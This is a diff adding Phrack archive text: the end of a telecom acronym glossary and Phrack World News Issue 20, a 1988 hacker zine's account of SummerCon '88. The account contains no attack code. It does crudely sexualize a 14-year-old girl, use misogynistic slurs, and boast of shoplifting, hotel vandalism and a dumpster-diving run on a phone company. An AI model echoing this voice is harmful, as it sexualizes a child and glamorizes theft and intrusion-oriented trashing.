+ONAL  Off Network Access Line
+ONI  Operator Number Identification
+OP  Outside Plant
+OPC  Originating Point Codes
+OPEOS  Outside Plant planning, Engineering & construction Operations Sys
+tem
+OPM  Outside Plant Module
+OPS  Off-Premises Station
+OPSM  Outside Plant Subscriber Module
+OPX  Off-Premises eXtension
+OR  Originating Register
+ORB  Office Repeater Bay
+ORM  Optical Remote Module
+OS  Operator Service
+OS  OutState
+OSAC  Operator Services Assistance Center
+OSC  Operator Services Center
+OSC  OSCillator
+OSDS  Operating System for Distributed Switching
+OSI  Open Systems Interconnection
+OSO  Originating Signaling Office
+OSP  OutSide Plant
+OSPS  Operator Service Position System
+OSS  Operator Service System
+OUTWATS  OUTward Wide Area Telecommunications Service
+OW  Over-Write
+P/AR  Peak-to-Average Ratio
+PA  Power Allarm
+PA  Program Address
+PABX  Private Automatic Branch eXchange
+PACE  Program for Arrangement of Cables and Equipment
+PACT  Prefix Access Code Translator
+PAD  Packet Assembly/Disassembly
+PAM  Pulse-Ampitude Modulation
+PAN  Personal Account Number
+PANS  Pretty Advanced New Stuff
+PAS  Public Announcement Service
+PAT  Power Alarm Test
+PAX  Private Automatic eXchange
+PBC  Peripheral Bus Computer
+PBC  Processor Bus Controller
+PBD  Pacific Bell Directory
+PBX  Private Branch eXchange
+PC  Primary Center
+PCDA  Program Controlled Data Acquisition
+PCH  Parallel CHannel
+PCM  Pulse-Code Modulation
+PCO  Peg Count and Overflow
+PCTV  Program Controlled TransVerters
+PD  Peripheral Decoder
+PDF  Power Distribution Frame
+PDI  Power and Data Interface
+PDN  Public Data Network
+PDSP  Peripheral Data Storage Processor
+PE  Peripheral Equipment
+PECC  Product Engineering Control Center
+PFPU  Processor Frame Power Unit
+PH  Parity High bit
+PIA  Plug-In Administrator
+PIC  Plastic-Insulated Cable
+PIC  Primary Independent Carrier
+PICS  Plug-in Inventory Control System (PICS/DCPR)
+PIN  Personal Identification Number
+PIP  Packet Interface Port
+PL  Parity Low bit
+PM  Peripheral Module
+PM  Plant Management
+PMAC  Peripheral Module Access Controller
+PMU  Precision Measurement Unit
+PNB  Pacific Northwest Bell
+PNPN  Positive-Negative-Positive-Negative devices
+POB  Periphal Order Buffer
+POF  Programmable Operator Facility
+POP  Point Of Presence
+POTS  Plain Old Telephone Service
+PP  Post Pay
+PPD  Peripheral Pulse Distributor
+PPN  Public Packet Switching
+PPS  Product Performance Surveys
+PPS  Public Packet Switching network
+PRCA  Puerto Rico Communications Authority
+PREMIS  PREMises Information System
+PRI  Primary Rate Interface
+PROM  Programmable Read-Only Memory
+PROMATS  PROgrammable Magnetic Tape System
+PROTEL  PRocedure Oriented Type Enforcing Language
+PRS  Personal Response System
+PRTC  Puerto Rico Telephone Company
+PS  Program Store
+PSAP  Public Safety Answering Point
+PSC  Prime Service Contractor
+PSC  Public Safety Calling system
+PSC  Public Service Commission
+PSDC  Public Switched Digital Capability
+PSE  Packet Switch Exchange
+PSIU  Packet Switch Interface Unit
+PSK  Phase-Shift Keying
+PSM  Packet Service Module
+PSM  Position Switching Module
+PSN  Packet Switched Network
+PSN  Public Switched Network
+PSO  Pending Service Order
+PSS  Packet Switch Stream
+PSS  Packet Switched Services
+PSTN  Public Switched Telephone Network
+PSU  Program Storage Unit
+PSW  Program Status Word
+PT  Program Timer
+PTAT  Private Trans Atlantic Telecommunications
+PTT  Postal Telephone and Telegraph
+PTW  Primary Translation Word
+PUC  Peripheral Unit Controller
+PUC  Public Utilities Commission
+PVC  Permanent Virtual Circuits
+PVN  Private Virtual Network
+QAM  Quadrature-Amplitude Modulation
+QAS  Quasi-Associated Signaling
+QMP  Quality Measurement Plan
+QRSS  Quasi Random Signal Source
+QSS  Quality Surveillance System
+R  Ring
+R&R  Rate & Route
+R&SE  Research & Systems Engineering
+R/O  Read/Only
+R/W  Read Write
+R/WM  Read/Write Memory
+RAM  Random-Access Memory
+RAND  Rural Area Network Design
+RAO  Regional Accounting Office
+RAO  Revenue Accounting Office
+RAR  Return Address Register
+RASC  Residence Account Service Center
+RBHC  Regional Bell Holding Company
+RBOC  Regional Bell Operating Company
+RBOR  Request Basic Output Report
+RC  Regional Center
+RC  Resistance-Capacitance
+RC MAC  Recent Change Memory Administration Center
+RCC  Radio Common Carrier
+RCC  Remote Cluster Controller
+RCC  Reverse Command Channel
+RCF  Remote Call Forwarding
+RCLDN  Retrieval of Calling Line Directory Number
+RCM  Remote Carrier Module
+RCSC  Remote Spooling Communications Subsystem
+RCU  Radio Channel Unit
+RCVR  ReCeiVeR
+RDES  Remote Data Entry System
+RDS  Radio Digital System
+RDT  Radio Digital Terminal
+REC  Regional Engineering Center
+REM  Remote Equipment Module
+REMOBS  REMote OBservation System
+REN  Ring Equivalence Number
+REXX  REstructred eXtended eXecuter language
+RF  Radio Frequency
+RID  Remote Isolation Device
+RISLU  Remote Integrated Services Line Unit
+RLCM  Remote Line Concentrating Module
+RLT  Remote Line Test
+RMAS  Remote Memory Administration System
+RMR  Remote Message Registers
+RMS  Root-Mean-Square
+RN  Reference Noise
+RNOC  Regional Network Operations Center
+RO  Receive Only
+ROB  Remote Order Buffer
+ROC  Regional Operating Company
+ROH  Receiver Off Hook
+ROM  Read-Only Memory
+ROTL  Remote Office Test Line
+RQS  Rate/Quote System
+RQSM  Regional Quality Service Management
+RRO  Reports Receiving Office
+RSA  Repair Service Attendant
+RSB  Repair Service Bureau
+RSC  Remote Switching Center
+RSC  Residence Service Center
+RSCS  Remote Source Control System
+RSCS  Remote Spooling Communications Subsystem
+RSLE  Remote Subscriber Line Equipment
+RSLM  Remote Subscriber Line Module
+RSM  Remote Switching Module
+RSS  Remote Switching System
+RSTS/E  Resource System Time Sharing/Enhanced
+RSU  Remote Switching Unit
+RTA  Remote Trunking Arrangement
+RTL  Resistor-Transistor Logic
+RTM  Regional Telecommunications Management
+RTM  Remote Test Module
+RTS  Remote Testing System
+RTU  Remote Trunking Unit
+RTU  Right To Use
+RUM  Remote User Multiplex
+RWC  Remote Work Center
+RX  Remote eXchange
+S  Sleeve
+SAC  Service Area Code
+SAC  Service Area Computer
+SAC  Special Area Code
+SAG  Street Address Guide
+SAI  Serving Area Interface
+SALI  Standalone Automatic Location Identification
+SAMA  Step by step Automatic Message Accounting
+SAR  Store Address Register
+SARTS  Switched Access Remote Test System
+SAT  Special Access Termination
+SAT  Supervisory Audio Tone
+SBMS  Southwestern Bell Mobile Service
+SBS  Skyline Business Systems
+SC  Scanner Controller
+SC  Sectional Center
+SCAT  Stromberg-Carlson Assistance Team
+SCC  Specialized Common Carrier
+SCC  Switching Control Center
+SCCS  Specialized Common Carrier Service
+SCCS  Switching Control Center System
+SCF  Selective Call Forwarding
+SCM  Subscriber Carrier Module
+SCO  Serving Central Office
+SCOT  Stepper Central Office Tester
+SCOTS  Surveillance & Control Of Transmissions System
+SCP  Signal Control Point
+SCP  Signal Conversion Point
+SCP  System Control Program
+SCPC  Signal Channel Per Carrier
+SCPD  Supplementary Central Pulse Distributor
+SCU  Selector Control Unit
+SCX  Specialized Communications eXchange
+SD&D  Specific Development & Design
+SDIS  Switched Digital Integrated Service
+SDL  Specification and Description Language
+SDLC  Synchronous Data Link Control
+SDN  Software-Defined Network
+SDOC  Selective Dynamic Overload Controls
+SDP  Service Delivery Point
+SDR  Store Data Register
+SDS  Switched Data Service
+SDS  Synchronous Data Set
+SDSC  Synchronous Data Set Controller
+SEAS  Signaling Engineering and Administration System
+SEL  SELector
+SES  Service Evaluation System
+SF  Single Frequency
+SFMC  Satellite Facility Management Center
+SG  SuperGroup
+SGML  Standard Generic Markup Language
+SGMP  Simple Gateway Management Protocol
+SI  Status Indicator
+SIC  Silicon Integrated Circuit
+SID  System IDentification
+SIT  Special Information Tone
+SLC  Subscriber Loop Carrier
+SLE  Screening Line Editor
+SLIC  Subscriber Line Interface Circuit
+SLIM  Subscriber Line Interface Module
+SM  Switching Module
+SMAS  Supplementary MAin Store
+SMAS  Switched Maintenance Access System
+SMASF  SMAS Frame
+SMASPU  SMAS Power Unit
+SMDF  Subscriber Main Distributing Frame
+SMDI  Subscriber Message Desk Interface
+SMDR  Station Message Detailed Recording
+SMG  SuperMasterGroup
+SMS  Service Management System
+SMSA  Standard Metropolitan Statistical Area
+SMTP  Simple Mail Transfer Protocol
+SNA  System Network Architecture
+SNADS  System Network Architecture Distribution Service
+SNET  Southern New England Telephone
+SOAC  Service Order Analysis Control
+SOC  Service Oversight Center
+SOH  Service Order History
+SONAR  Service Order Negotiation And Retrieval
+SONDS  Small Office Network Data System
+SP  Signal Processor
+SP  Signaling Point
+SPAN  Space Physics Analysis Network
+SPAN  System Performance ANalyzer
+SPC  Southern Pacific Communications
+SPC  Stored Program Control
+SPCS  Stored Program Control Systems
+SPI  Serial Peripheral Interface
+SPUC/DL  Serial Peripheral Unit Controller/Data Link
+SQL/DS  Structured Query Language/Data System
+SRA  Selective Routing Arrangement
+SS  Special Services
+SSAS  Station Signaling and Announcement Subsystem
+SSB  Single-SideBand
+SSBAM  Single-SideBand Amplitude Modulation
+SSC  Special Services Center
+SSCP  Subsystem Services Control Point
+SSO  Satellite Switching Office
+SSP  Signal Switching Point
+SSP  Sponsor Selective Pricing
+SSP  System Status Panel
+SSPC  SSP Controller
+SSPRU  SSP Relay Unit
+SSTTSS  Space-Space-Time-Time-Space-Space network
+ST  STart
+STC  Serving Test Center
+STC  Switching Technical Center
+STD  Subscriber Trunk Dialing
+STDM  Statistical Time Division Multiplexing
+STP  Signal Transfer Point
+STS  Shared Tenant Service
+STS  Space-Time-Space network
+SVC  Switched Virtual Circuits
+SVS  Switched Voice Service
+SWB  SouthWestern Bell
+SX  SimpleX signaling
+SXS  Step by (X) Step
+SYC  SYstem Control
+SYSGEN  SYStem GENeration
+T  Tip
+T1/OS  T1 carrier OutState
+T1FE  T1 carrier Front End
+TA  Terminal Adaptor
+TA  Transfer Allowed
+TAC  Terminal Access Circuit
+TAP  Telephone Assistance Plan
+TAS  Telephone Answering Service
+TASC  Technical Assistance Service Center
+TASC  Telecommunications Alarm Surveillance and Control system
+TASI  Time Assignment Speech Interpolation system
+TAT  TransAtlantic Telephone
+TC  Timing Counter
+TC  Toll Center
+TCAP  Transaction Capabilities Applications Port
+TCAS  T-Carrier Administration System
+TCC  Trunk Class Code
+TCG  Test Call Generation
+TCM  Time Compression Multiplexer
+TCM  Trellis Coded Modulation
+TCR  Transient Call Record
+TDAS  Traffic Data Administration System
+TDC  Tape Data Controller
+TDC  Terrestrial Data Circuit
+TDD  Telecommunications Device for Deaf
+TDM  Time Division Multiplexing
+TE  Terminal Equipment
+TE  Transverse Electric
+TEHO  Tail End Hop Off
+TELSAM  TELephone Service Attitude Measurement
+TERM  TERMinal
+TFLAP  T-carrier Fault-Locating Applications Program
+TFS  Trunk Forecasting System
+TGC  Terminal Group Controller
+TGN  Trunk Group Number
+TH  Trouble History
+TIA  Telephone Information Access
+TIRKS  Trunk Integrated Record Keeping System
+TLM  Trouble Locating Manual
+TLN  Trunk Line Network
+TLP  Transmission Level Point
+TLTP  Trunk Line and Test Panel
+TM  Transverse Magnetic
+TMDF  Trunk Main Distributing Frame
+TMMS  Telephone Message Management System
+TMR  Transient Memory Record
+TMRS  Traffic Measurement and Recording System
+TMRS  Traffic Metering Remote System
+TMS  Time-Multiplexed Switch
+TN  Telephone Number
+TN  Transaction Number
+TNDS  Total Network Data System
+TNN  Trunk Network Number
+TNOP  Total Network Operation Plan
+TNPC  Traffic Network Planning Center
+TOPS  Timesharing OPerating System
+TOPS  Traffic Operator Position System
+TP  Toll Point
+TPMP  Total network data system Performance Measurement Plan
+TR  Test Register
+TR  Transfer Register
+TREAT  Trouble Report Evaluation Analysis Tool
+TRMTR  TRamsMiTteR
+TRR  Tip-Ring Reverse
+TSCPF  Time Switch and Call Processor Frame
+TSCPF  Time Switch and Central Processor Frame
+TSI  Time Slot Interchanger
+TSO  Time Sharing Option
+TSORT  Transmission System Optimum Relief Tool
+TSP  Test SuPervisor
+TSP  Traffic Service Position
+TSPS  Traffic Service Position System
+TSS  Trunk Servicing System
+TSST  Time-Space-Space-Time network
+TST  Time-Space-Time network
+TST  Traveling-Wave Tube
+TSTS  Time-Space-Time-Space network
+TT  Trunk Type
+TTC  Terminating Toll Center
+TTL  Transistor-Transistor Logic
+TTP  Trunk Test Panel
+TTS  Trunk Time Switch
+TTTN  Tandem Tie Trunk Network
+TTY  TeleTYpewriter
+TTYC  TTY Controller
+TUR  Traffic Usage Recording
+TUR  Trunk Utilization Report
+TWX  TeletypeWriter eXchange
+UCD  Uniform Call Distribution
+UIC  User Identification Code
+UID  User ID
+UITP  Universal Information Transport Plan
+UNISTAR  UNIversal Single call Telecommunications Answering & Repair
+USB  Upper Side Band
+USITA  United States Independent Telephone Association
+USO  Universal Service Order
+USOC  Universal Service Order Code
+USP  Universal Sampling Plan
+UUCICO  Unix to Unix Copy Incoming Copy Outgoing
+UUCP  Unix to Unix Copy Program
+VAN  Value Added Network
+VC  Virtual Circuit
+VCS  Virtual Circuit System
+VF  Voice Frequency
+VFY  VeriFY
+VGF  Voice Grade Facility
+VHF  Very High Frequency
+VINES  VIrtual NEtwork Software
+VIU  Voiceband Interface Unit
+VLSI  Very Large-Scale Integrated circuitry
+VM/SP  Virtual Machine/System Product
+VMCF  Virtual Machine Communications Facility
+VMR  Volt-Meter Reverse
+VMRS  Voice Message Relay System
+VMS  Virtual Memory operating System
+VMS  Voice Mail System
+VMS  Voice Management System
+VNF  Virtual Network Feature
+VNL  Via Net Loss plan
+VNLF  Via Net Loss Factor
+VODAS  Voice Over Data Access Station
+VPN  Virtual Private Network
+VRS  Voice Response System
+VSAM  Virtual Storage Access Method
+VSAT  Very Small Aperature Terminal
+VSB  Vestigial SideBand modulation
+VSE  Virtual Storage Extended
+VSR  Voice Storage and Retrieval
+VSS  Voice Storage System
+VSSP  Voice Switch Signaling Point
+VTAM  Virtual Telecommunications Access Method
+VTI  Virtual Terminal Interface
+VTOC  Volume Table Of Contents
+VTS  Video Teleconferencing System
+WAN  Wide Area Network
+WATS  Wide Area Telephone Service
+WC  Wire Center
+WCPC  Wire Center Planning Center
+WDT  Watch Dog Timer
+WM  Work Manager
+XB  X-Bar
+XBAR  X-BAR
+XBT  X-Bar Tandem
+XFE  X-Front End
+XMS  eXtended Multiprocessor operating System
+
+
+                                      ^*^
+=========================================================================
diff --git a/phrack20/12.txt b/phrack20/12.txt
new file mode 100644
index 0000000..089e705
--- /dev/null
+++ b/phrack20/12.txt
@@ -0,0 +1,407 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 20, File 12 of 12
+
+
+           PWN ^*^ PWN ^*^ PWN { SummerCon '88 } PWN ^*^ PWN ^*^ PWN
+           ^*^                                                   ^*^
+           PWN                 Phrack World News                 PWN
+           ^*^                     Issue XX                      ^*^
+           PWN                                                   PWN
+           ^*^             "SummerCon Strikes Again"             ^*^
+           PWN                                -----              PWN
+           ^*^          Created, Written, and Edited             ^*^
+           PWN               by Knight Lightning                 PWN
+           ^*^                                                   ^*^
+           PWN             (It is good to be back!)              PWN
+           ^*^                                                   ^*^
+           PWN ^*^ PWN ^*^ PWN { SummerCon '88 } PWN ^*^ PWN ^*^ PWN
+
+Welcome to Phrack World News Issue XX.  Whew!  Issue 20 already?  I have been
+gone too long.  This issue features the exclusive coverage of SummerCon 1988,
+which took place in St. Louis, Missouri during the weekend of July 22-24, 1988.
+Before we get to the bulk of the issue I'd like to make a note that this year's
+turnout was even greater than last year's with the majority of those claiming
+they would attend, actually showing up... we had a great time. -KL
+
+Please Note:  All the events depicted in this story are based on the
+              observations as seen by Knight Lightning (me).
+
+PreCon '88; A Little Background
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+When Taran King and I went off to college, Sir Francis Drake picked up running
+Phrack Inc. and PWN.  Taran gave the rights to SummerCon to Sir Francis Drake
+as well, although it was not really his right to give away.  At any rate, SFD
+intended to hold SummerCon '88 in New York City, possibly by trying to get Bill
+>From RNOC or Tuc to help him out, since SFD lived out on the west coast.  A lot
+of publicity was put out in both 2600 Magazine and WORM (a hardcopy magazine
+for "cyberpunks" written and distributed by Sir Francis Drake himself).
+However, eventually it became quite clear that SummerCon '88 would not be held
+in NYC, at least not by SFD.
+
+In the meantime, there was quite a bit of controversy concerning SummerCon '88
+on a bulletin board known as The Forgotten Realm, run by Crimson Death 618.
+Apparently the members of TFR were trying to figure out where to have the
+convention.  Control C said that he would hold SummerCon '88 in Detroit,
+Michigan, but the only person who really liked that idea was Ax Murderer.
+
+Eventually it came down to two places; New York City or St. Louis, Missouri.
+The discussion went on for over a month with everyone leaning heavily towards
+St. Louis.   The clincher came when Prime Suspect received word from myself,
+that we were indeed planning SummerCon '88 here in St. Louis.  So on June 19,
+1987 (the ONE year anniversary of SummerCon '87) Crimson Death contacted
+Phantom Phreaker to get to Taran King who in turn passed the word on to me and
+I called Crimson Death.  We set the date and as such, the actual preliminary
+planning for SummerCon '88 had begun.
+
+Crimson Death sent the word out and I finally had a chance to release the idea
+I had conceived two months prior... The Phoenix Project.  The new millennium
+has begun and the rebirth of the phreak/hack community has been achieved.  In
+fact, this rebirth is currently evident in a more physical fashion on a fairly
+new bulletin board earning its name from my idea...
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                              The Phoenix Project
+                              300/1200/2400 Baud
+                                (512) 754-8182
+
+                         Brought to you by The Mentor!
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+SummerCon '88; Not As Planned...                  Friday Morning, July 22, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Coincidentally, Tuc was again this year's first arrival from out of town.
+Taran King, Forest Ranger, and I arrived at the airport to greet him and after
+some hassle at Lambert Field, we grabbed some lunch and went to this year's
+official SummerCon hotel; the Ramada Inn - Westport.
+
+>From here things did not go exactly to plan.  Over three weeks in advance I had
+reserved a double room in Forest Ranger's name to serve as the Phrack Inc. room
+or whatever as sort of a base of operations.  Ramada had a super savers weekend
+promotion going on all through summer where a limited number of rooms (doubles)
+could be purchased for a special weekend rate of $33.90.  Well I was sure to
+get this rate and was given a reservation identification number.  However, the
+check-in counter at first denied this and then finally pulled up the file.
+They insisted that the room was for $68.00 and that was what we were told.
+They were incorrect.  At about this time, Taran and I had wandered into the
+main lobby where we were confronted by a guy who subtly said, "Are you here for
+SummerCon ?"
+
+It was The Dictator, who had come from Phoenix, Arizona (602 NPA).  He had
+already gotten a room (211) at the ridiculous price of $68.00.  Unfortunately,
+we still had a problem, because the hotel supervisor insisted that we weren't
+21 anyway and by Missouri State Law they could not legally rent us a room at
+any rate.  This is when I jumped in saying we had reserved the room for Tuc who
+was 22 and I had been promised the rate of $33.90.  The supervisor began to
+tell some story of a computer error (yeah right) and the person who guaranteed
+the room was wrong.  I argued that it was their problem and not ours if there
+was indeed this computer error and that this gross display of bad business and
+false advertising would be reported to the Better Business Bureau.  In the
+meantime Tuc, Taran, and Forest Ranger had grabbed a copy of the Southwestern
+Bell Yellow Pages (it really is easier to let your fingers do the walking) and
+were checking out other hotels in the Westport area.  My biggest concern was
+for all the guests driving in who thought we would be at the Ramada.  It was
+not long before the hotel supervisor had spoken to the hotel manager and they
+offered us the room for a flat rate of $40.00.  We took it.  The rooms were
+quite nice actually and would serve our purposes well.
+
+Taran and I ran off on separate errands, while Forest Ranger and Tuc visited
+Westport Plaza to do some shopping.   When Taran and I returned, we ran into
+another interesting person who said, "You guys here for SummerCon?"  It was
+Dr. Cypher of Bellcore and with him was Mike (a non phreak/hack type, but cool
+just the same) and Hatchet Molly, a 23 year old graduate student at Northern
+Illinois University who was working on his thesis; the social atmosphere of the
+phreak/hack community or something like that.
+
+It was only about 20 minutes later when I wandered down to the lobby and found
+Lucifer 666 and Synthetic Slug checking in.  Standing five feet behind them was
+another fearsome threesome made up of Crimson Death 618, Phrozen Ghost, and
+Surfer Bob.  PG and SB had been visiting Crimson Death earlier that week prior
+to reaching SummerCon and they all arrived at the same time.  Lucifer 666 and
+Synthetic Slug got a room, while the others crashed in the Phrack Inc. room.
+
+SummerCon '88; Back At Lambert                  Friday Afternoon, July 22, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+It was time for another trip to the airport for me, Taran, Tuc, and Forest
+Ranger.  We arrived just in time to meet up with The Mentor and Cisban Evil
+Priest.  They were easy to spot because they were the only guys on the plane
+that were not wearing suits and/or did not have any children with them.
+
+Once greetings had taken place, Mentor unveiled a surprise -- buttons
+especially made for distribution at SummerCon '88.  Created with a laser
+printer they displayed a large "NO FEDS" with a circle and line through it
+(like a No U-Turn sign), and also naming The Phoenix Project (the board), the
+baud rate, and phone number.  He brought more than enough for everyone.
+
+After some running around the airport and a brief lounge at one of the
+airport's bars, we proceeded to meet up with Control C and Bad Subscript who
+had flown in from Detroit, Michigan.  We divided up again and headed for the
+hotel.  Taran King, Tuc, and Cisban Evil Priest rode with me while The Mentor,
+Control C, and Bad Subscript rode with Forest Ranger.  Control C decided he was
+hungry and FR drove to the nearest McDonald's where he went on to cut off a
+customer in the drive-through lane and pulled right to the window to pick up
+some food... not his food, but who cares.
+
+     "That will be $3.00, sir."
+     "What exactly do I get for my $3.00?"
+     "Two regular cheese burgers, a large fries, and a large Coke."
+     "Okay!"
+
+They took it and left, leaving McDonald's in a total disarray for at least a
+half hour.
+
+The Mentor and Cisban Evil Priest as well as Control C and Bad Subscript both
+got rooms and from there SummerCon '88 really began.
+
+SummerCon '88; Let The Good Times Roll              Friday Night, July 22, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Basically it was just a big party from here on, with the old phreaks meeting
+the new, and some re-acquaintances.  Control C brought down some gifts as well
+-- posters from Michigan Bell.
+
+               "I would shred everything, because we get so much
+               information out of the dumpster,  it's unreal..."
+
+It was signed by Control C himself and he told us that these posters now appear
+in all Michigan Bell central offices and other places of business.  The picture
+on the poster featured Control C's own personal stash that he had gotten from
+Michigan Bell.
+
+We had some other guests arrive during the night.  Terminal Technocrat and a
+friend of his (who did have a handle, but I didn't catch it) arrived from
+Milwaukee, Wisconsin.  A friend of Forest Ranger's named Mike also showed up
+with Kari, Cary, Katie, Susie, and Amy [some serious bitches].  The main party
+ran through The Dictator's room until a series of threatening calls from the
+front desk forced TD to clear everyone out of his room.
+
+In the meantime, Cary (a nymphomaniac 14-year old) was running up Tuc's phone
+bill and hitting on everyone at the convention.  She ended up with Cisban Evil
+Priest in his room (that he shared with The Mentor).  However, since clearing
+out of The Dictator's room the majority of the party crew all ran into Mentor
+and Priest's room causing quite a disturbance.  When The Mentor heard about
+this he ran to his room and threw them all out.  This action set the rest of
+the night's activities to a certain theme -- The Fury of Forest Ranger.
+
+You see Forest Ranger was quite a bit drunk and became incredibly pissed off
+when he found out that his friends were mistreated.  A few of us returned to
+The Dictator's room where FR made several threatening phone calls to The Mentor
+and was promptly hung up on.  Apparently that was the last straw because FR
+went into an unstoppable rage that trashed most of the items in the room and
+then he started through the hotel.  After damaging several items in the hotel
+hallways, Forest Ranger proceeded to attack a light fixture in the emergency
+stairwell and in doing so, sliced his hand open on the newly broken glass.
+
+Emergency measures were called for -- Tuc and Lucifer 666 played rescue team
+and took Forest Ranger to a not so nearby United States Air Force Hospital in
+Illinois, where Forest Ranger was stitched up.
+
+After the excitement, most of the people at the convention had mellowed out and
+Dr. Forbin left to take Cary home (we still don't know what happened to the two
+of them, but rumor is that Forbin is making a tremendous recovering from
+several serious venereal diseases.)
+
+At some point this evening Terminal Technocrat, Dr. Cypher, and a few others
+decided to go on a trashing run.  It didn't really turn out as planned and they
+ended up at Southwestern Bell Publications (where the cameras are almost as big
+as the dumpsters).  It was unsuccessful, but at least there were no casualties.
+
+The final interesting part of this evening was the arrival of The Leftist and
+The Ur-Vile from Atlanta, Georgia.  This arrival is important to make a note of
+because with the exception of the time spent immediately after they got to the
+hotel, The Ur-Vile spent the entire remainder of SummerCon '88 asleep.
+
+SummerCon '88; So What Now?                             Saturday, July 23, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Just about everyone went to Union Station, a luxurious shopping mall in
+downtown St. Louis.  However, a few of us including Taran King and myself
+arrived at the hotel in time to meet our final guests for the weekend --
+Phantom Phreaker and Doom Prophet.
+
+Taran King and myself took a Crimson Death back to TK's to let him copy some
+unreleased files for Phrack Inc. (since he had been running it at the time).
+However, now those files will be put out by the original Phrack team.
+
+The main part of the convention started sometime after that and I presented the
+second public hearing of the now famous Dan The Operator/John Maxfield and the
+Dan The Operator/Il Duce (Phiber Optick) recordings which were featured in
+Phrack World News XV, which was published last year.  I have decided to make
+this an annual event and those wishing a copy of the tape should get in contact
+with me through Epsilon, The Prophet, or through Bitnet.
+
+Unfortunately, the most important information learned at this year's convention
+cannot be published.  However, when looking at the amount and the extent of
+information brought forth at this year's convention, it makes last year's look
+like a day at pre-school.  If the level jumps like this next year, I think that
+the world had better watch out because today's phreak/hacks are definitely
+getting smarter and better every year.  The key is to stay out of trouble long
+enough to gain experience that will keep you out of trouble.
+
+The Leftist brought a terminal with him and it would have been a great "toy" to
+have at the convention except no one had the extra phone cord necessary to put
+it to good use.
+
+The rest of Saturday evening was just a mix of story telling, partying, and
+some deep technical discussions.  There was some element of danger present.  It
+would seem that because of the trouble from the previous evening that the hotel
+management had arranged to have some extra security present in case things got
+out of hand.  The Maryland Heights police force sent a pair of officers over,
+and they were indeed the rudest individuals I have ever met.
+
+At one point in the evening, Lucifer 666 and I had traveled down to the lobby
+by way of the stairs and when arrived, the greetings from "officer friendly"
+reminded me of last SummerCon's police incident ("Run to me boys!").
+
+           (We were wearing our "NO FEDS" pins during this incident)
+
+    "You two come here, NOW!"
+    "What?  Waitasec we are guests here (holding up keys)."
+    "I can't see that far, you come here, NOW!"
+    "Why did you take the stairs instead of the elevator!?"
+    "The elevator was too slow, sir."
+    "What are you doing down here?"
+    "Going to the soda and candy machines."
+    "I don't want any messing around here tonight, you got that!?"
+    "Yes, we are not looking for problems."
+
+A couple of hours later, I had decided to go to my car to drop a few items off
+and found myself being followed by the same officer.  After I had been to my
+car, I started back towards the hotel with this jerk eyeballing me.  When I had
+reached the building I asked him...
+
+    "Is there a problem officer?"
+    "No, you got a problem!?  Do you want to have a problem!?"
+    "Nope."
+
+After this incident I returned everyone's room keys, exited the hotel by a back
+stairway, hopped into my car and pulled around to the front where the lobby and
+the two officers were.  I calmly honked a couple of times and with my lights
+off so as not to reveal my plates, gave them "the bird."  I left the area at a
+rather fast pace after that.
+
+SummerCon '88; All Good Things Must Come To An End        Sunday, July 24, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By the time I returned on Sunday morning, Terminal Technocrat and his friend
+had long since been gone as well as Dr. Cypher, Hatchet Molly and Mike.  The
+rest of us hung out for a while as we prepared to pack everything up and send
+everyone home.  The Leftist, The Ur-Vile, Lucifer 666, and Synthetic Slug had
+to cruise and in the meantime I took Tuc, Control C, and Bad Subscript to the
+airport breaking five speed limits in order for them to catch their newly
+scheduled flights.
+
+After which this left me, Forest Ranger, Phantom Phreaker, Doom Prophet, The
+Mentor, Cisban Evil Priest, Crimson Death, Phrozen Ghost, and Surfer Bob.  We
+were soon joined by Amy and Katie and we all headed out to the St. Louis
+Galleria, another shopping plaza.  On the way, we toured through some of StL's
+richer sections of town and as we went on became separated from Forest Ranger
+in downtown Clayton.  After five minutes of massive confusion we were once
+again on track and eventually met up with Forest Ranger and Surfer Bob who was
+with him at a music store inside the plaza.
+
+We killed about two hours there between lunch, Phrozen Ghost's Unix Manual
+heist from B. Dalton Booksellers, and the Phantom Phreaker/Doom Prophet Vs.
+"Goons From Hell" skateboard confrontation.  So after all was said and done,
+Forest Ranger took Crimson Death, Phrozen Ghost, and Surfer Bob back to Ramada
+to get their car, Phantom Phreaker and Doom Prophet hit the highway, and The
+Mentor and Cisban Evil Priest went with me back one last time to Lambert Field,
+where I dropped them off.
+
+And that was SummerCon '88 ...
+_______________________________________________________________________________
+
+PostCon '88; Some Things To Make A Note Of...
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+This year's SummerCon posters were made by Knight Lightning and they featured
+AT&T, MCI, U.S. Sprint and the FON card, Southwestern Bell, ISDN diagrams, Pink
+Floyd, Domino's Pizza, and many other interesting items including; Oryan QUEST!
+
+                      "I *Demand* you attend SummerCon!"
+
+              "I demand to be let back on MSP! or I will UNLEASH
+             with FULL FORCE (and put a maintenance busy on you!)"
+
+                    To obtain a copy of this poster contact
+              Epsilon, The Prophet or try and find me on Bitnet.
+-------------------------------------------------------------------------------
+Control C and The Mentor were both made members of the Legion Of Doom/Hackers.
+-------------------------------------------------------------------------------
+The Mentor's now famous Hacker's Manifesto which was first released in Phrack
+Inc. Issue VII appeared in the September issue of Thrasher Magazine.
+-------------------------------------------------------------------------------
+        The Dictator is looking for users to call his bulletin board...
+                  The Dark Side (Commodore 128) 602-789-9269
+-------------------------------------------------------------------------------
+Who Was This Year's Fed/Informant?  I have some strong possibilities about
+that, , but there is an interesting twist to the story.  On Monday evening,
+July 25, 1988, Forest Ranger claimed that he had received a call (from a source
+he refused to disclose) stating that Secret Service was indeed at SummerCon '88
+and were in room 209 (right next to 211 - The Dictator's room) and another room
+supposedly under Control C and Bad Subscript's room.
+
+There were reports of supposed Secret Service agents at Ramada, but the general
+idea was that even if they were legitimate, it was because of Democratic
+Presidential nominee Govenor Michael S. Dukakis, who was visiting St. Louis
+that weekend.  When I heard all of this, I paid no attention to it because the
+way it was described, it was just a bunch of jerks being pesky about the "NO
+FEDS" pins.
+-------------------------------------------------------------------------------
